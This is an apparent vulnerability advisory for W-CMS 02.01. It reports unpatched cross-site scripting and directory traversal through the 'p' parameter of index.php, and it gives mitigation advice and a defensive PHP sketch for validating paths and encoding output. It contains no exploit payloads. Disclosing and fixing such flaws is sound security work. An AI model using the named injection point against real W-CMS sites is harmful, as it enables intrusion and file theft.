Vendor: W-CMS
By: th3.g4m3_0v3r
CVSS: 5.5 (MEDIUM)
Cross-Site Scripting (XSS), Directory Traversal
CWE: 79, 22
Product Name: W-CMS
Affected Version From: 02.01
Affected Version To: 02.01
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Windows 7
2012
W-Cms Multiple Vulnerability
W-CMS is vulnerable to cross-site scripting (XSS) and directory traversal attacks. The XSS vulnerability can be exploited through 'index.php' and the '?p=' parameter, allowing an attacker to inject malicious scripts. The directory traversal vulnerability allows an attacker to access sensitive files on the server by manipulating the 'p' parameter.
Mitigation:
To mitigate the XSS vulnerability, input validation and output encoding should be implemented to prevent the execution of malicious scripts. To mitigate the directory traversal vulnerability, proper input validation and file path restrictions should be enforced.
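
The following sketch shows both mitigations applied to a `p` page parameter. It is an added example, not W-CMS code or a vendor patch. The `pages` directory, the `.txt` extension, and the helper names `resolve_page` and `e` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical content directory; the real W-CMS layout is not given in the advisory.
const PAGE_DIR = __DIR__ . '/pages';

/** Map the user-supplied ?p= value to a file inside $baseDir, or return null. */
function resolve_page(string $p, string $baseDir = PAGE_DIR): ?string
{
    // Input validation: accept simple page names only, so "../", "\", NUL bytes
    // and absolute paths are rejected before any filesystem call.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $p) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . $p . '.txt');
    if ($base === false || $file === false) {
        return null; // directory or page does not exist
    }
    // Path restriction: the canonical path must still sit under the base
    // directory (this also catches symlinks that point elsewhere).
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

/** Output encoding for values echoed into HTML text or a quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$p = $_GET['p'] ?? 'home';
$p = is_string($p) ? $p : ''; // "?p[]=x" arrives as an array, not a string
$file = resolve_page($p);

header('Content-Type: text/html; charset=UTF-8');
if ($file === null) {
    http_response_code(404);
    // The rejected value is encoded before it is reflected back.
    echo '<p>Page not found: ' . e($p) . '</p>';
} else {
    echo '<h1>' . e($p) . '</h1>';
    echo '<div>' . e((string) file_get_contents($file)) . '</div>';
}
```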